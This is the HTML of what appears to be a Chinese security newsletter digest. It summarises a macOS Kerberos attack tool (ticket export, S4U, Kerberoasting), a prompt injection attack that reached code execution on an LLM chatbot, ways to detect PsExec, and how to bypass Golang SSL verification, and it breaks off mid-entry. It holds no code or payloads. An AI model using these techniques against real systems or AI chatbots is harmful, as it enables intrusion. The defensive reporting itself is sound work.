		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Bifrost 是一个针对 macOS 设备上 Heimdal krb5 APIs 的 Objective-C 项目，旨在通过原生 API 进行更好的安全测试，特别是针对 Kerberos 的测试，无需安装额外的框架或包。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3XWGOEV5ZClRK6ZEMHUsmVCR6T92SQvHWdoVbliafjp8xYVzfuhYCmKw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3XWGOEV5ZClRK6ZEMHUsmVCR6T92SQvHWdoVbliafjp8xYVzfuhYCmKw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855412551814142"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Bifrost 项目的设计目的是为了在 macOS 环境下进行 Kerberos 安全测试，它利用了 Heimdal krb5 APIs 提供的功能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Bifrost 提供了一系列命令行工具，使得安全研究人员能够更方便地操作和测试 Kerberos 认证流程。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过 Bifrost，用户可以轻松地导出和导入 Kerberos 票证，以及执行高级操作，如 S4U 和 Kerberoasting。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Bifrost 支持多种加密类型，确保了在不同安全要求的环境中的适用性。</section></li></ul>
	<br/>
	<p>🏷️: 网络安全, 工具使用</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 利用提示注入攻击生成式AI聊天机器人的方法</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">NetSPI 研究人员通过 prompt injection 漏洞成功地对一个集成了大型语言模型（LLM）的聊天机器人进行了攻击，实现了远程代码执行（RCE），并强调了 AI 聊天机器人安全性的重要性。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3YXcylJkc86sJvJM4oABib6q4PBIUAibOPlLqqBQ6IbXichdicNSK6lpEIQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3YXcylJkc86sJvJM4oABib6q4PBIUAibOPlLqqBQ6IbXichdicNSK6lpEIQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122485212828184"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AI 聊天机器人的安全性至关重要，尤其是当它们能够接受和执行用户输入时。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">聊天机器人的代码执行功能需要得到适当的限制和隔离，以防止恶意行为。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于 AI 系统，应该实施强 authentication 和 access controls 以防止未授权的交互。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AI 系统的输入应该进行验证和消毒，以防止 prompt injection 和其他攻击技术。</section></li></ul>
	<br/>
	<p>🏷️: AI安全, 聊天机器人, 提示注入, 语言模型, 系统漏洞</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 识别PsExec的关键方法</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了如何识别并分析使用 PsExec 工具的活动，特别是在安全事件和恶意软件攻击中，强调了新的识别方法，如 USN 日志和 Prefetch 文件。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3LmKFfdCnFLpMDibOXJpFGr6VIwXQpA6PEoLV0RHD5libGdhFibbZ7iayNw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3LmKFfdCnFLpMDibOXJpFGr6VIwXQpA6PEoLV0RHD5libGdhFibbZ7iayNw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122485211222254"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PsExec 是一个强大的工具，但也常被威胁行为者用于恶意目的，如勒索软件部署。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过系统事件 7045 和安全事件 4624 类型 3，可以追踪 PsExec 的执行和源系统。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PsExec v2.30 及以后版本引入了 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">.key</code> 文件的机制，这些文件的创建被记录在 USN 日志和 Prefetch 文件中，为分析师提供了新的识别手段。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管存在一些异常情况，USN 日志中可能不会记录 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">.key</code> 文件的创建事件，但这些新的识别方法对于取证分析和追踪威胁行为者的活动至关重要。</section></li></ul>
	<br/>
	<p>🏷️: PsExec, 远程管理工具, 威胁行为者, 系统安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 如何绕过Golang的SSL验证</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了如何在使用 Golang 的 HTTPS 请求时绕过 SSL 证书验证，包括手动修改代码和使用 Python 脚本自动化修补预编译应用程序的方法。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3xYpBKqgLOyl67LB5X9BtWBlAyFCibicmiayAVceL3rpLpOrVCEJvjF4hw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3xYpBKqgLOyl67LB5X9BtWBlAyFCibicmiayAVceL3rpLpOrVCEJvjF4hw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844215482185128"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Golang 的 HTTPS 请求默认启用 SSL 验证，这可能会干扰安全测试和漏洞检查。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">直接修改预编译应用程序的二进制文件是绕过 SSL 验证的一种方法，这对于没有源代码访问权限的情况尤其有用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">深入理解 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, 